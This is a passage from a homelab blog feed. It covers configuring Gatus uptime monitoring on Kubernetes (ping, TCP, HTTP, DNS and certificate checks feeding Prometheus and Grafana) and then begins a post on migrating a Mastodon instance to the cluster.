meaning my dashboards were green, but Mastodon would still be unreachable. So
I slowly switched to HTTP and raw TCP socket checks to make sure that the
services were actually reachable, and not just healthy.</p>
<p>There were always two things which I didn&rsquo;t like about Uptime Kuma. First, it
requires some storage, because it stores its data in an SQLite database. Second,
the configuration can only be done via the web UI and is then stored into the
database. So no versioning of the config. And I&rsquo;ve become very fond of having
my Homelab configs under version control over the years.</p>
<p>So when it came to planning the k8s migration, I looked around and was pointed
to <a href="https://github.com/TwiN/gatus">Gatus</a>, I think by <a href="https://www.youtube.com/watch?v=LeZQjWlDUHs">this video</a> video from <a href="https://www.youtube.com/@TechnoTim">Techno Tim</a>
on YouTube. It has two advantages over Uptime Kuma, namely that it does not
need any storage and that it is entirely configured via a YAML file. Of course,
the fact that it can run without storage also means that after a restart, the
history is gone. But this is fine for me, because I don&rsquo;t need a history, as
I&rsquo;m sending the data to Prometheus anyway. This is not to say that Gatus
doesn&rsquo;t support persistence. It can be run with a PostgreSQL or SQLite database.
But I don&rsquo;t need any persistence in my setup.</p>
<h2 id="setup">Setup</h2>
<p>As Gatus doesn&rsquo;t have any dependencies, I can get right into the Deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gatus</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">gatus</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">gatus</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/config</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/gatus-config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sysctls</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">net.ipv4.ping_group_range</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">value</span>: <span style="color:#ae81ff">0</span> <span style="color:#ae81ff">65536</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gatus</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">twinproduction/gatus:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">add</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#ae81ff">CAP_NET_RAW</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">250m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">100Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GATUS_LOG_LEVEL</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;DEBUG&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/health&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gatus-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gatus-conf</span>
</span></span></code></pre></div><p>There&rsquo;s not much interesting to say about the Deployment, it&rsquo;s pretty much
the standard Deployment in my Homelab. With one exception: The <code>CAP_NET_RAW</code>
I&rsquo;m adding to the container, and the <code>sysctls</code> setting:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sysctls</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">net.ipv4.ping_group_range</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">value</span>: <span style="color:#ae81ff">0</span> <span style="color:#ae81ff">65536</span>
</span></span><span style="display:flex;"><span>[<span style="color:#ae81ff">...]</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">add</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#ae81ff">CAP_NET_RAW</span>
</span></span></code></pre></div><p>These are due to my usage of pings to determine whether a host is up or not.
When initially running without those configs, I got the following:</p>
<pre tabindex="0"><code>2025/03/08 16:09:38 [watchdog.execute] Monitored group=Hosts; endpoint=Host: Foobar; key=hosts_host:-Foobar; success=false; errors=0; duration=0s; body=
</code></pre><p>Not too helpful, but it indicated that the host <code>foobar</code> was not returning the
pings. But I knew the host was up, and I knew I was able to ping it from the
host running the Gatus pod. After some searching, I found <a href="https://github.com/TwiN/gatus/issues/697">this issue</a>,
and the explanation that running <code>ping</code> required some privileges. This is done
by setting the setuid bit on the <code>ping</code> executable, which is owned by <code>root</code>.
But here, the ping is executed through a Go library, not by running the <code>ping</code>
executable. And because the container doesn&rsquo;t run as root, there are just not
enough privileges to ping anything from the Gatus process.
On a lower level, <code>ping</code> uses RAW network sockets, which are privileged in the
Linux kernel.
The <code>sysctls</code> setting was proposed as a solution in the issue I linked above,
but only setting that did not work for me. I had to add the <code>CAP_NET_RAW</code>
capability. Still better than running the container in fully privileged mode.</p>
<h2 id="configuration">Configuration</h2>
<p>Gatus allows configuration via a Yaml file. The common part of my config
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">metrics</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">memory</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">web</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ui</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">title</span>: <span style="color:#e6db74">&#34;Meiers Homelab&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Monitoring for Meiers Homelab&#34;</span>
</span></span></code></pre></div><p>Again, nothing really noteworthy, enabling the <code>memory</code> storage type and the
metrics endpoint, which exposes Prometheus metrics for every endpoint at <code>/metrics</code>.</p>
<p>Then come the endpoints, which is Gatus&rsquo; name for &ldquo;things to monitor&rdquo;.
I will show a couple of examples for the different things I monitor, starting
with the host monitoring via ping:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;Host: Foobar&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">group</span>: <span style="color:#e6db74">&#34;Hosts&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">url</span>: <span style="color:#e6db74">&#34;icmp://foobar.home&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">5m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">conditions</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;[CONNECTED] == true&#34;</span>
</span></span></code></pre></div><p>This config sends a ping to <code>foobar.home</code> every five minutes and registers the
check as successful if it receives a reply.
It also puts the check into the <code>Hosts</code> group. Here&rsquo;s where Gatus is a bit less
flexible than Uptime Kuma was, where individual dashboards can be created.</p>
<p>Next, I&rsquo;m using TCP socket connections to check whether my Ceph MON daemons
are up, at least in so far as that they accept connections:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;Ceph: Mon Baz&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">group</span>: <span style="color:#e6db74">&#34;Ceph&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">url</span>: <span style="color:#e6db74">&#34;tcp://baz.home:6789&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">2m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">conditions</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;[CONNECTED] == true&#34;</span>
</span></span></code></pre></div><p>This check tries to establish a TCP connection to the host:port given in the URL.
I was also wanting to configure a check on the health of the Ceph cluster
overall. And Ceph&rsquo;s MGR/dashboard module supplies one at <a href="https://docs.ceph.com/en/reef/mgr/ceph_api/#health">/api/health</a>,
a few different ones with different details even. And Gatus itself allows you
to check a lot of different things in the body of the response received by a
HTTP check. But the issue here was that Gatus doesn&rsquo;t support simple basic auth
for monitored endpoints, and Ceph itself only allows authenticated access to the
HTTP API, including the health endpoint.</p>
<p>As a short aside, I&rsquo;m still a bit torn on authenticated health endpoints. I think
that they should definitely be an option - if you&rsquo;ve got auth infrastructure for
everything anyway, there&rsquo;s not much cost for setting your monitoring up with a
valid token. But in a Homelab, it gets really annoying really fast. On the other
hand, any unauthenticated endpoint is a potential entryway into your app. So I
understand putting that behind auth. But I would like it to be optional, please.
Give me an option to say &ldquo;Yes, authenticate everything - besides the health API&rdquo;.
Sure, I could set up OAuth2 for the Ceph API and then configure Gatus to use it,
but that seems just a bit too much hassle, considering that I&rsquo;m already getting
the health status via Prometheus scraping anyway.</p>
<p>Okay, next example is an HTTP check on my Consul server:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;Cluster: Consul&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">group</span>: <span style="color:#e6db74">&#34;Cluster&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">url</span>: <span style="color:#e6db74">&#34;https://consul.example.com:8501/v1/status/leader&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#e6db74">&#34;GET&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">2m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">conditions</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;[STATUS] == 200&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">client</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">insecure</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>The <code>insecure: true</code> option is required here, because the Consul server uses my
internal CA, and providing the CA certs to Gatus was just a bit too much hassle,
especially for a service I will be taking down soon anyway.</p>
<p>Next up, checking whether my internal authoritative DNS server is working:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;Infra: DNS Bar&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">group</span>: <span style="color:#e6db74">&#34;Infra&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">url</span>: <span style="color:#e6db74">&#34;bar.home:53&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">2m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dns</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">query-name</span>: <span style="color:#e6db74">&#34;ingress.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">query-type</span>: <span style="color:#e6db74">&#34;A&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">conditions</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;[BODY] == 300.300.300.1&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;[DNS_RCODE] == NOERROR&#34;</span>
</span></span></code></pre></div><p>This check makes a DNS request for <code>ingress.example.com</code> to <code>bar.home</code> and then
checks that the response is the correct IP, and that there was no error.
I&rsquo;m running this check with the IP of my ingress, because it&rsquo;s a stable IP that
doesn&rsquo;t change, and the ingress is probably the most stable component in my
setup.</p>
<p>Last but not least, here is the config for checking how long a cert is going
to be valid:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;Infra: mei-home.net cert&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">group</span>: <span style="color:#e6db74">&#34;Infra&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">url</span>: <span style="color:#e6db74">&#34;https://blog.mei-home.net&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">12h</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">conditions</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;[CERTIFICATE_EXPIRATION] &gt; 72h&#34;</span>
</span></span></code></pre></div><p>This one uses my blog to check whether my cert for mei-home.net is still valid
for at least three days.</p>
<p>And this is what the web UI looks like:
<figure>
    <img loading="lazy" src="gatus-groups.png"
         alt="A screenshot of Gatus main dashboard. It&#39;s headed &#39;Health Status&#39; and shows several groups as collapsed lists. Each group has a name, in this case &#39;Ceph&#39;, &#39;Cluster&#39;, &#39;Hosts&#39;, &#39;Infra&#39;, &#39;K8s&#39; and &#39;Services&#39;. To the right of the name of each group is a green check mark indicating the groups current status, which turns into a red X if any of the checks in that group fails."/> <figcaption>
            <p>Gatus dashboard with all groups collapsed.</p>
        </figcaption>
</figure>

Each individual check is then shown like this when the group is expanded:
<figure>
    <img loading="lazy" src="gatus-service.png"
         alt="A screenshot of an expanded check in Gatus&#39; dashboard. It shows the name of the check at the top and then a row of green check marks below that, one for each recent execution of the check. To the right, it also shows the average duration of the check, 41 ms in this case for the blog.mei-home.net check. To the very left and very right, the execution time of the oldest and newest check is shown, respectively."/> <figcaption>
            <p>Expanded service in Gatus&rsquo; web UI.</p>
        </figcaption>
</figure>
</p>
<p>I don&rsquo;t foresee visiting this page too often, as I will mostly get the information
from the Grafana dashboard I will describe in the next section.</p>
<h2 id="metrics-and-grafana">Metrics and Grafana</h2>
<p>Gatus provides metrics in Prometheus format at the <code>/metrics</code> endpoint:</p>
<pre tabindex="0"><code># HELP gatus_results_certificate_expiration_seconds Number of seconds until the certificate expires
# TYPE gatus_results_certificate_expiration_seconds gauge
gatus_results_certificate_expiration_seconds{group=&#34;Infra&#34;,key=&#34;infra_infra:-mei-home-net-cert&#34;,name=&#34;Infra: mei-home.net cert&#34;,type=&#34;HTTP&#34;} 3.276935592538658e+06
# HELP gatus_results_endpoint_success Displays whether or not the endpoint was a success
# TYPE gatus_results_endpoint_success gauge
gatus_results_endpoint_success{group=&#34;Hosts&#34;,key=&#34;hosts_host:-foobar&#34;,name=&#34;Host: Foobar&#34;,type=&#34;ICMP&#34;} 1
</code></pre><p>Armed with this information, I set up a new static scrape for my <a href="https://blog.mei-home.net/posts/k8s-migration-9-prometheus/">Prometheus deployment</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">monitoring.coreos.com/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScrapeConfig</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scraping-gatus</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prometheus</span>: <span style="color:#ae81ff">scrape-gatus</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">staticConfigs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">job</span>: <span style="color:#ae81ff">gatus</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targets</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;gatus.gatus.svc.cluster.local:8080&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metricsPath</span>: <span style="color:#e6db74">&#34;/metrics&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">HTTP</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">scrapeInterval</span>: <span style="color:#e6db74">&#34;1m&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metricRelabelings</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">sourceLabels</span>: [<span style="color:#e6db74">&#34;__name__&#34;</span>]
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;go_.*&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">sourceLabels</span>: [<span style="color:#e6db74">&#34;__name__&#34;</span>]
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;promhttp_.*&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">sourceLabels</span>: [<span style="color:#e6db74">&#34;__name__&#34;</span>]
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;process_.*&#39;</span>
</span></span></code></pre></div><p>Nothing special to see, besides filtering out some app metrics I never look at
anyway.</p>
<p>Finally, I use that data in a <a href="https://grafana.com/docs/grafana/latest/panels-visualizations/visualizations/state-timeline/">Grafana state timeline visualization</a>:
<figure>
    <img loading="lazy" src="state-timeline.png"
         alt="A screenshot of a Grafana state timeline panel. On the left, it shows a number of service names, like &#39;Gitea&#39; or &#39;Jellyfin&#39;. To the right of each service name is a mostly green line, for some services interrupted by short intervals of red. "/> <figcaption>
            <p>Service uptime panel in my Homelab dashboard.</p>
        </figcaption>
</figure>
</p>
<p>The panel is driven by this Prometheus query:</p>
<pre tabindex="0"><code>gatus_results_endpoint_success
</code></pre><p>Yupp, as simple as that.
In addition, I&rsquo;m using Gatus&rsquo; certificate expiry metrics to drive a <a href="https://grafana.com/docs/grafana/latest/panels-visualizations/visualizations/stat/">stat panel</a>:
<figure>
    <img loading="lazy" src="cert-expiry.png"
         alt="A screenshot of a Grafana stat panel. It is headed &#39;Cert Valid for&#39; and currently shows &#39;5.42 weeks&#39; in green."/> <figcaption>
            <p>Stat panel for my public cert expiry.</p>
        </figcaption>
</figure>

It is driven by this PromQL query:</p>
<pre tabindex="0"><code>gatus_results_certificate_expiration_seconds{name=&#34;Infra: mei-home.net cert&#34;}
</code></pre><h2 id="conclusion">Conclusion</h2>
<p>And this concludes the Uptime Kuma to Gatus switch post. And this post also marks
the end of phase 1 of the Nomad to k8s migration. Uptime Kuma was the last service
left on Nomad, after it I only had infrastructure jobs like CSI plugins and
a Traefik ingress running.
I would say in total, this first phase of setting up the k8s cluster itself,
Rook Ceph and migrating all services over cost me about six months or so. I got
started in earnest towards Christmas 2023, and then worked away at it until about
April, when I was rudely interrupted by my backup setup not being viable for
k8s. I then finally got back into it a couple of months ago, in the beginning
of 2025.</p>
<p>The next steps will be completely decommissioning the Nomad cluster and migrating
the baremetal Ceph hosts over to the Rook Ceph cluster. The work is pretty
mechanical at the moment, with all of the cleanups, so the next blog post might
take a while. I mean, unless something explodes in my face in an amusing way. &#x1f605; Although I might hold a wake for my HashiCorp Nomad cluster once
I&rsquo;ve fully taken it down.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 20: Migrating Mastodon</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-20-mastodon/</link>
      <pubDate>Thu, 06 Mar 2025 22:45:05 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-20-mastodon/</guid>
      <description>Migrating my Mastodon instance to k8s with the official Helm chart</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my Mastodon instance to the k8s cluster.</p>
<p>This is part 21 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p><a href="https://github.com/mastodon/mastodon">Mastodon</a> is currently serving as my
presence in the <a href="https://fediverse.party/en/fediverse/">Fediverse</a>. You can
find me <a href="https://social.mei-home.net/@mmeier">here</a>, although I&rsquo;m pretty sure
that most of my readers are coming from there already. &#x1f604;</p>
<p>If you&rsquo;re at all interested in joining a genuine community around Homelabbing,
I can only recommend to join the fun by following the HomeLab or SelfHosted
hashtags and wildly following everyone appearing on there. It&rsquo;s a great community
of rather friendly people enjoying everything from a lonely Pi to several
42U 19&quot; racks full of equipment. If you&rsquo;re interested in learning more about
my own experience with the Fediverse and hosting my own single-user instance,
have a look at <a href="https://blog.mei-home.net/tags/fediverse/">these older posts</a>.</p>
<h2 id="preparations">Preparations</h2>
<p>There were two things which needed to be migrated from my Nomad cluster to
the k8s deployment: The S3 bucket holding all of the media, and the database.</p>
<p>The database is, by a very large margin, the biggest in my Homelab, clocking in
at 2.5 GB. I think it could be a lot smaller, but I completely disabled cleanups
for remote posts a while ago. That was due to the fact that the automated cleanup
also deletes posts I had bookmarked for reading later, and I&rsquo;m not very good
at actually keeping up with those - so after a while I went through them and
became pretty convinced that I was missing some I had bookmarked a while ago.
I will likely do some cleanups manually when it really becomes too big to be
manageable.</p>
<p>I will not describe the entire migration process here, because it is similar to
previous migrations. If you&rsquo;re interested, have a look at <a href="https://blog.mei-home.net/posts/k8s-migration-16-gitea/#database-setup-and-migration">my post about the Gitea
migration</a>,
where I describe the database migration with <a href="https://cloudnative-pg.io/">CNPG</a>
in detail.
In short, it was very painless. I provided the database with a 15 GB volume,
which seems a bit overboard in hindsight. At some point in the future I will
have to figure out how to do database sizing and go through all of my CNPG
clusters, because I&rsquo;m pretty sure most of them are overprovisioned.</p>
<p>Next came the S3 bucket. The first mistake I made here was to forget to
exclude the <code>cache/</code> prefix. So I copied all of the currently cached media over
instead of just letting Mastodon re-fetch whatever it actually needed. That
prefix currently holds 56 GB out of 61 GB total. Which reminds me that I need to
check whether the automatic cleanup is working on the k8s setup or not.
But yeah, if I had remembered to remove that prefix, I could have saved a lot
of time for the copy operation. As it stands, these are the stats for the copy,
which I did with <a href="https://rclone.org/">rclone</a>:</p>
<pre tabindex="0"><code>Transferred:       61.786 GiB / 61.786 GiB, 100%, 6.279 MiB/s, ETA 0s
Transferred:       384921 / 384921, 100%
Elapsed time:    3h7m29.8s
</code></pre><p>Those 6.279 MiB/s are utterly abysmal. Those of you who read my previous post
on <a href="https://blog.mei-home.net/posts/ceph-copy-latency/">my media library copy operation</a>
probably already know: It was the 4 TB Seagate HDD, which was fully slammed again.
There&rsquo;s definitely something bad about this disk.
But anyway, three hours later I was done and had everything copied over.</p>
<p>Before I close the preparations, let&rsquo;s have some fun and look at the CPU usage
of the FluentD container in my k8s cluster:
<figure>
    <img loading="lazy" src="fluentd-usage.png"
         alt="A screenshot of a Grafana time series plot. It&#39;s showing the CPU usage, given on the Y axis in &#39;cores&#39;, of my FluentD instance over the three hours from 09:55 to 13:10 where the S3 bucket was copied. It hovers at 0.1 in the beginning and end, but goes up to 0.4, with spikes to 0.5 between 09:55 and 13:10, before then going down again."/> <figcaption>
            <p>CPU usage of my FluentD log aggregation container.</p>
        </figcaption>
</figure>

Not even the RGW or OSD containers were using more CPU during the copy. The reason
seems to be that I&rsquo;ve still got my ingress Traefik instance set to debug log level:
<figure>
    <img loading="lazy" src="traefik-log-rate.png"
         alt="A screenshot of a Grafana time series plot. It shows the log rate of my Traefik ingress container during the S3 bucket copy. The rate goes from about 1 log entry per second to over 70 per second, where it stays throughout the copy operation, before finally going back to about 1 per second."/> <figcaption>
            <p>Log rate of my Traefik ingress container.</p>
        </figcaption>
</figure>

I&rsquo;m now starting to wonder whether this might be part of the reason for why the
copy was so slow - the disk might have also been loaded by Loki pushing all these
log lines to its own S3 bucket. &#x1f926;
Sadly, I don&rsquo;t have precise enough metrics for that, as I can only see the
throughput by pool in my Ceph stats, and both the Mastodon bucket and the Loki
bucket are in the same pool.
Something to try to dig into a little bit later.</p>
<h2 id="the-mastodon-setup">The Mastodon setup</h2>
<p>I deployed my Mastodon instance with the <a href="https://github.com/mastodon/chart">official Mastodon chart</a>.
One important note: This one is, at some point in the future, going to be replaced
with <a href="https://github.com/mastodon/helm-charts">a new one</a>, see the <a href="https://github.com/mastodon/chart/issues/129">relevant issue</a>.</p>
